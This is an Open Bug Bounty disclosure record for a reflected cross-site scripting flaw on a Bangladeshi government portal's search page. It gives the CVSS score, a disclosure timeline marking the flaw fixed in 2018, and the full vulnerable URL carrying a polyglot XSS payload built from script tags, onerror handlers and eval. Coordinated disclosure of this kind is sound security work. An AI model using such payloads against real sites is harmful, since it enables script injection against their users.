giu.portal.gov.bd XSS vulnerability

2016-07-26T13:38:00
ID OBB:169495
Type openbugbounty
Reporter XSSbot
Modified 2018-03-15T02:43:00

Description

Open Bug Bounty ID: OBB-169495

| Description | Value |
|---|---|
| Affected Website: | giu.portal.gov.bd |
| Vulnerable Application: | Custom Code |
| Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79 |
| CVSSv3 Score: | 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] |
| Remediation Guide: | OWASP XSS Prevention Cheat Sheet |

Vulnerable URL:
http://giu.portal.gov.bd/site/search?key=%5B%27%27%5D%22%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\%3E%3C/|\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E@gmail.com%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27--%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cimg/id=%22confirm(%20OPENBUGBOUNTY)%22/alt=%22/%22src=%22/%22onerror=eval(id&%23x29;%3E%27%22%3E%3Cimg%20src=%22http:%20www.openbugbounty.org/images/design/openbugbounty-logo.png%22%3E%20%EF%BF%BC

Coordinated Disclosure Timeline

| Description | Value |
|---|---|
| Vulnerability Reported: | 26 July, 2016 13:38 GMT |
| Vulnerability Verified: | 26 July, 2016 13:42 GMT |
| Website Operator Notified: | 26 July, 2016 13:42 GMT |
| Vulnerability Published: | 26 July, 2016 13:42 GMT [without any technical details] |
| Vulnerability Fixed: | 15 March, 2018 02:43 GMT |
| Public Disclosure: | 15 March, 2018 02:43 GMT |